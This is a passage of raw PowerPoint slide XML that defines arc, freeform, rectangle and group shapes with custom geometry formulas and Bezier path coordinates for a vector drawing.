                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C005D78-075F-A544-8CE5-186C481CE894}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1012" y="2242"/>
                  <a:ext cx="22" cy="10"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 1437 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 32065 w 32065"/>
                    <a:gd name="T1" fmla="*/ 20332 h 23037"/>
                    <a:gd name="T2" fmla="*/ 48 w 32065"/>
                    <a:gd name="T3" fmla="*/ 0 h 23037"/>
                    <a:gd name="T4" fmla="*/ 21600 w 32065"/>
                    <a:gd name="T5" fmla="*/ 1437 h 23037"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="32065" h="23037" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32065" y="20332"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28862" y="22106"/>
                        <a:pt x="25261" y="23037"/>
                        <a:pt x="21600" y="23037"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="23037"/>
                        <a:pt x="0" y="13366"/>
                        <a:pt x="0" y="1437"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="957"/>
                        <a:pt x="15" y="478"/>
                        <a:pt x="47" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="32065" h="23037" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="32065" y="20332"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28862" y="22106"/>
                        <a:pt x="25261" y="23037"/>
                        <a:pt x="21600" y="23037"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9670" y="23037"/>
                        <a:pt x="0" y="13366"/>
                        <a:pt x="0" y="1437"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66856" name="Arc 1320">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04D9FAB-3E7E-B74A-A827-08A6FBA06062}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2211"/>
                  <a:ext cx="18" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4236 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25836"/>
                    <a:gd name="T1" fmla="*/ 419 h 32090"/>
                    <a:gd name="T2" fmla="*/ 23118 w 25836"/>
                    <a:gd name="T3" fmla="*/ 32090 h 32090"/>
                    <a:gd name="T4" fmla="*/ 4236 w 25836"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32090"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25836" h="32090" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="419"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1394" y="140"/>
                        <a:pt x="2813" y="0"/>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0"/>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7" name="Arc 1321">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63ECFAD9-E433-DC4C-8AEA-6DA9695ECC38}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2212"/>
                  <a:ext cx="17" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 4042 0 0"/>
                    <a:gd name="G1" fmla="+- 21600 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 0 w 25642"/>
                    <a:gd name="T1" fmla="*/ 381 h 32484"/>
                    <a:gd name="T2" fmla="*/ 22700 w 25642"/>
                    <a:gd name="T3" fmla="*/ 32484 h 32484"/>
                    <a:gd name="T4" fmla="*/ 4042 w 25642"/>
                    <a:gd name="T5" fmla="*/ 21600 h 32484"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="25642" h="32484" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="0" y="381"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1332" y="127"/>
                        <a:pt x="2685" y="0"/>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0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66858" name="Arc 1322">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF2803-2DAA-F943-A966-1C313A504504}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1082" y="2225"/>
                  <a:ext cx="16" cy="13"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17021 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 13298 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 28665"/>
                    <a:gd name="T2" fmla="*/ 18193 w 21600"/>
                    <a:gd name="T3" fmla="*/ 28665 h 28665"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17021 h 28665"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>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9" name="Arc 1323">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3FD5AB-BE31-6346-87AF-EC72F1884474}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1082" y="2226"/>
                  <a:ext cx="15" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 0 0 0"/>
                    <a:gd name="G1" fmla="+- 17280 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12960 w 21600"/>
                    <a:gd name="T1" fmla="*/ 0 h 29262"/>
                    <a:gd name="T2" fmla="*/ 17972 w 21600"/>
                    <a:gd name="T3" fmla="*/ 29262 h 29262"/>
                    <a:gd name="T4" fmla="*/ 0 w 21600"/>
                    <a:gd name="T5" fmla="*/ 17280 h 29262"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="29262" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12960" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18399" y="4079"/>
                        <a:pt x="21600" y="10481"/>
                        <a:pt x="21600" y="17280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="21544"/>
                        <a:pt x="20337" y="25713"/>
                        <a:pt x="17971" y="29261"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="29262" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12960" y="0"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66860" name="Arc 1324">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F559DC1-DC04-2645-8E6B-340F3D4E7B88}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2237"/>
                  <a:ext cx="20" cy="20"/>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1" name="Arc 1325">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6885EDB9-AD62-114E-9C29-8AF57DB41BFF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1076" y="2238"/>
                  <a:ext cx="19" cy="18"/>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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66862" name="Arc 1326">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1360C62-1D45-F647-B8BF-0B407AF4FCC1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1005" y="2225"/>
                  <a:ext cx="10" cy="17"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21583 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12736 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41281 h 41281"/>
                    <a:gd name="T2" fmla="*/ 20755 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41281"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21583 h 41281"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41281" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12736" y="41280"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4984" y="37792"/>
                        <a:pt x="0" y="30082"/>
                        <a:pt x="0" y="21583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9982"/>
                        <a:pt x="9163" y="453"/>
                        <a:pt x="20754" y="-1"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41281" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12736" y="41280"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4984" y="37792"/>
                        <a:pt x="0" y="30082"/>
                        <a:pt x="0" y="21583"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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3" name="Arc 1327">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A663B838-209A-894F-B0F7-BC81BE603C64}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1006" y="2226"/>
                  <a:ext cx="9" cy="15"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21600 0 0"/>
                    <a:gd name="G1" fmla="+- 21584 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 12827 w 21600"/>
                    <a:gd name="T1" fmla="*/ 41322 h 41322"/>
                    <a:gd name="T2" fmla="*/ 20766 w 21600"/>
                    <a:gd name="T3" fmla="*/ 0 h 41322"/>
                    <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                    <a:gd name="T5" fmla="*/ 21584 h 41322"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="41322" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12826" y="41322"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5026" y="37855"/>
                        <a:pt x="0" y="30119"/>
                        <a:pt x="0" y="21584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9979"/>
                        <a:pt x="9169" y="448"/>
                        <a:pt x="20766" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="21600" h="41322" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="12826" y="41322"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5026" y="37855"/>
                        <a:pt x="0" y="30119"/>
                        <a:pt x="0" y="21584"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0"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sz="1797" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="66864" name="Arc 1328">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABB8CCB-FFE4-FA48-93F2-F28BED4BD988}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1034" y="2249"/>
                  <a:ext cx="43" cy="12"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21340 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 39157 w 39157"/>
                    <a:gd name="T1" fmla="*/ 12212 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 39157"/>
                    <a:gd name="T3" fmla="*/ 3343 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21340 w 39157"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="39157" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39156" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35129" y="18087"/>
                        <a:pt x="28463" y="21600"/>
                        <a:pt x="21340" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10701" y="21600"/>
                        <a:pt x="1646" y="13853"/>
                        <a:pt x="0" y="3342"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="39157" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="39156" y="12211"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35129" y="18087"/>
                        <a:pt x="28463" y="21600"/>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5" name="Arc 1329">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793FB06-01EF-F34F-BD2C-AAF24B23A149}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1035" y="2249"/>
                  <a:ext cx="40" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="G0" fmla="+- 21316 0 0"/>
                    <a:gd name="G1" fmla="+- 0 0 0"/>
                    <a:gd name="G2" fmla="+- 21600 0 0"/>
                    <a:gd name="T0" fmla="*/ 38879 w 38879"/>
                    <a:gd name="T1" fmla="*/ 12574 h 21600"/>
                    <a:gd name="T2" fmla="*/ 0 w 38879"/>
                    <a:gd name="T3" fmla="*/ 3488 h 21600"/>
                    <a:gd name="T4" fmla="*/ 21316 w 38879"/>
                    <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="38879" h="21600" fill="none" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38878" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34822" y="18239"/>
                        <a:pt x="28283" y="21600"/>
                        <a:pt x="21316" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10732" y="21600"/>
                        <a:pt x="1708" y="13932"/>
                        <a:pt x="-1" y="3488"/>
                      </a:cubicBezTo>
                    </a:path>
                    <a:path w="38879" h="21600" stroke="0" extrusionOk="0">
                      <a:moveTo>
                        <a:pt x="38878" y="12573"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="34822" y="18239"/>
                        <a:pt x="28283" y="21600"/>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866" name="Group 1330">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6B87BD-0D58-5D41-886C-44749914F44F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1523" y="332"/>
              <a:ext cx="170" cy="169"/>
              <a:chOff x="775" y="1966"/>
              <a:chExt cx="170" cy="169"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66867" name="Freeform 1331">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3053CA86-7B26-1D4D-A530-BB53CDF65284}"/>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8" name="Freeform 1332">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8770AD72-2E65-A74C-B902-356794AF6E3A}"/>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69" name="Rectangle 1333">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98126895-392E-6643-A2EE-E0A5A62E1170}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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70" name="Rectangle 1334">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F32673-DD66-B94B-BA5E-034F838A81C6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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71" name="Freeform 1335">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AAAA32E-AE10-6646-9905-F472E8C10728}"/>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72" name="Freeform 1336">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4345455A-C526-C04B-8AE0-630F3C990B69}"/>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73" name="Freeform 1337">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69906903-545B-8348-9438-B6E2E0BA103A}"/>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74" name="Freeform 1338">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5BB089-D768-E447-BBAD-B7E78C0DC8C8}"/>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875" name="Freeform 1339">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B1170D-B3AE-DD4B-BFDB-D9539C3643D3}"/>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76" name="Freeform 1340">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5361F189-6B08-3649-91C7-7D12A112EB51}"/>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77" name="Rectangle 1341">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D93D51C-E441-6347-9770-E4E724DE26FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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78" name="Rectangle 1342">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33E5AFCD-EB06-A64B-BD5D-0E9B486800C8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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879" name="Freeform 1343">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF48099-F7AA-004C-9B30-90130EF30D56}"/>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80" name="Freeform 1344">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B568C58F-DD68-3345-A76F-0123ECD65BD3}"/>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81" name="Freeform 1345">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CFD3576-48FE-2748-9AD4-9F5C1C20E09B}"/>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82" name="Freeform 1346">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4507067-908F-1540-9637-A8DBD94FC6A8}"/>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83" name="Freeform 1347">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1983BB3D-D973-554E-A04C-CA2BDD85C965}"/>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84" name="Freeform 1348">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9724FA-C671-DF4B-B221-11464B4C85A2}"/>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85" name="Rectangle 1349">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F1E36D7-0695-054C-BB27-6E447AEA915A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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86" name="Rectangle 1350">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B73CCE4-BF70-0544-B1C7-B31AFA9F4403}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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887" name="Group 1351">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D495B601-0D95-934E-9B9B-1E2432DCEF0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1568" y="370"/>
              <a:ext cx="92" cy="56"/>
              <a:chOff x="820" y="2004"/>
              <a:chExt cx="92" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66888" name="Group 1352">
                <a:extLst>
